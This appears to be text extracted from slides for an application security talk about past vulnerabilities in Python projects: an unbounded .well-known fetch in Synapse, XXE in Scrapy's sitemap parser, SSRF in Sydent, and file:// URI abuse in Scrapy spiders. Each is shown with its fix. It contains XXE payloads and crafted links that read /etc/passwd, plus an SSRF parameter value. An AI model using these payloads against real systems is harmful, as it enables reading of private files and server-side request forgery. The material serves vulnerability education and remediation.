Claudio Salazar
🧑💻 Application Security Engineer @ ChartMogul
🐍 9 years developing in Python
Expertise in:
🕸 web scraping
🤺 secure software development
🕵🏼♂️ vulnerability research
# server_name is under my control
uri = b"https://%s/.well-known/matrix/server" % (server_name, )
uri_str = uri.decode("ascii")
logger.info("Fetching %s", uri_str)
try:
response = yield self._well_known_agent.request(b"GET", uri)
body = yield readBody(response)
if response.code != 200:
raise Exception("Non-200 response %s" % (response.code, ))
parsed_body = json.loads(body.decode('utf-8'))
logger.info("Response from .well-known: %s", parsed_body)
...
GET /.well-known/matrix/server HTTP/1.1
Host: domain.tld
uri = b"https://%s/.well-known/matrix/server" % (server_name, )
uri_str = uri.decode("ascii")
logger.info("Fetching %s", uri_str)
try:
response = yield self._well_known_agent.request(b"GET", uri)
body = yield readBody(response)
if response.code != 200:
raise Exception("Non-200 response %s" % (response.code, ))
parsed_body = json.loads(
body.decode('utf-8')
)
logger.info("Response from .well-known: %s", parsed_body)
...
uri = b"https://%s/.well-known/matrix/server" % (server_name,)
uri_str = uri.decode("ascii")
logger.info("Fetching %s", uri_str)
try:
response = await self._well_known_agent.request(b"GET", uri)
body = await read_body_with_max_size(response, WELL_KNOWN_MAX_SIZE)
if response.code != 200:
raise Exception("Non-200 response %s" % (response.code,))
parsed_body = json_decoder.decode(body.decode("utf-8"))
logger.info("Response from .well-known: %s", parsed_body)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY example "hello"> ]>
<demo>
<demoId>&example;</demoId>
</demo>
<demo>
<demoId>hello</demoId>
</demo>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/issue.net"> ]>
<demo>
<demoId>&example;</demoId>
</demo>
<demo>
<demoId>Ubuntu 20.04.3 LTS
</demoId>
</demo>
from scrapy.spiders import SitemapSpider
class MySpider(SitemapSpider):
sitemap_urls = ['http://www.example.com/sitemap.xml']
def parse(self, response):
...
class Sitemap(object):
def __init__(self, xmltext):
xmlp = lxml.etree.XMLParser(recover=True, remove_comments=True)
self._root = lxml.etree.fromstring(xmltext, parser=xmlp)
...
# Documentation lxml.etree.XMLParser
XMLParser(
...,
resolve_entities=True,
...
)
<?xml version="1.0" encoding="UTF-8"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
<sitemap>
<loc>http://domain.tld/sitemap1.xml.gz</loc>
<lastmod>2004-10-01T18:23:17+00:00</lastmod>
</sitemap>
</sitemapindex>
spider -> http://domain.tld/sitemap1.xml.gz
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
<sitemap>
<loc>http://domain.tld/&xxe;.xml</loc>
</sitemap>
</sitemapindex>
spider -> http://domain.tld/root:x:0:0:root:/root:/bin/bash[...].xml
class Sitemap(object):
def __init__(self, xmltext):
xmlp = lxml.etree.XMLParser(
recover=True,
remove_comments=True,
resolve_entities=False
)
self._root = lxml.etree.fromstring(xmltext, parser=xmlp)
...
Image from PortSwigger Web Security Academy
def render_POST(self, request):
send_cors(request)
args = get_args(request, ('matrix_server_name', 'access_token'))
result = yield self.client.get_json(
"matrix://%s/_matrix/federation/v1/openid/userinfo?access_token=%s" %
(args['matrix_server_name'], urllib.parse.quote(args['access_token']),
),
)
def render_POST(self, request):
send_cors(request)
args = get_args(request, ('matrix_server_name', 'access_token'))
result = yield self.client.get_json(
"matrix://%s/_matrix/federation/v1/openid/userinfo?access_token=%s" %
(args['matrix_server_name'], urllib.parse.quote(args['access_token']),
),
)
matrix_server_name=domain.tld/path_under_control?args_too=values_too#
def render_POST(self, request):
send_cors(request)
args = get_args(request, ('matrix_server_name', 'access_token'))
result = yield self.client.get_json(
"matrix://domain.tld/path_under_control?args_too=values_too#..."
)
matrix_server_name=domain.tld/path_under_control?args_too=values_too#
args = get_args(request, ("matrix_server_name", "access_token"))
matrix_server = args["matrix_server_name"].lower()
if not is_valid_matrix_server_name(matrix_server):
request.setResponseCode(400)
return {
"errcode": "M_INVALID_PARAM",
"error": "matrix_server_name must be a valid Matrix server name ...",
}
result = await self.client.get_json(
"matrix://%s/_matrix/federation/v1/openid/userinfo?access_token=%s"
% (
matrix_server,
urllib.parse.quote(args["access_token"]),
),
1024 * 5,
)
args = get_args(request, ("matrix_server_name", "access_token"))
matrix_server = args["matrix_server_name"].lower()
if not is_valid_matrix_server_name(matrix_server):
request.setResponseCode(400)
return {
"errcode": "M_INVALID_PARAM",
"error": "matrix_server_name must be a valid Matrix server name ...",
}
result = await self.client.get_json(
"matrix://%s/_matrix/federation/v1/openid/userinfo?access_token=%s"
% (
matrix_server,
urllib.parse.quote(args["access_token"]),
),
1024 * 5,
)
class FederationHttpClient(HTTPClient):
def __init__(self, sydent: "Sydent") -> None:
self.sydent = sydent
self.agent = MatrixFederationAgent(
BlacklistingReactorWrapper(
reactor=self.sydent.reactor,
ip_whitelist=sydent.config.general.ip_whitelist,
ip_blacklist=sydent.config.general.ip_blacklist,
),
ClientTLSOptionsFactory(sydent.config.http.verify_federation_certs)
if sydent.use_tls_for_federation
else None,
)
class FederationHttpClient(HTTPClient):
def __init__(self, sydent: "Sydent") -> None:
self.sydent = sydent
self.agent = MatrixFederationAgent(
BlacklistingReactorWrapper(
reactor=self.sydent.reactor,
ip_whitelist=sydent.config.general.ip_whitelist,
ip_blacklist=sydent.config.general.ip_blacklist,
),
ClientTLSOptionsFactory(sydent.config.http.verify_federation_certs)
if sydent.use_tls_for_federation
else None,
)
🤝 URI handlers give support for protocols
import scrapy
from scrapy.http import Request
class ExampleSpider(scrapy.Spider):
name = "example_spider"
allowed_domains = ["dangerous.tld"]
start_urls = ["http://dangerous.tld/"]
def parse(self, response):
next_url = response.xpath("//a/@href").extract_first()
yield Request(next_url, self.parse_next)
<!doctype html>
<body>
<a href="/next">click!</a>
</body>
import scrapy
from scrapy.http import Request
class ExampleSpider(scrapy.Spider):
name = "example_spider"
allowed_domains = ["dangerous.tld"]
start_urls = ["http://dangerous.tld/"]
def parse(self, response):
next_url = response.xpath("//a/@href").extract_first()
yield Request(next_url, self.parse_next)
<!doctype html>
<body>
<a href="file:///etc/passwd">click!</a>
</body>
In [1]: from urllib.parse import urlparse
In [2]: urlparse("file:///etc/passwd").hostname is None
Out[2]: True
In [3]: urlparse("file://dangerous.tld/etc/passwd").hostname
Out[3]: 'dangerous.tld'
<!doctype html>
<body>
<a href="file://dangerous.tld/etc/passwd">click!</a>
</body>
# settings.py
...
DOWNLOAD_HANDLERS = {
'file': None,
'data': 'scrapy.core.downloader.handlers.datauri.DataURIDownloadHandler',
'http': 'scrapy.core.downloader.handlers.http.HTTPDownloadHandler',
'https': 'scrapy.core.downloader.handlers.http.HTTPDownloadHandler',
's3': 'scrapy.core.downloader.handlers.s3.S3DownloadHandler',
'ftp': 'scrapy.core.downloader.handlers.ftp.FTPDownloadHandler',
}
Thanks to: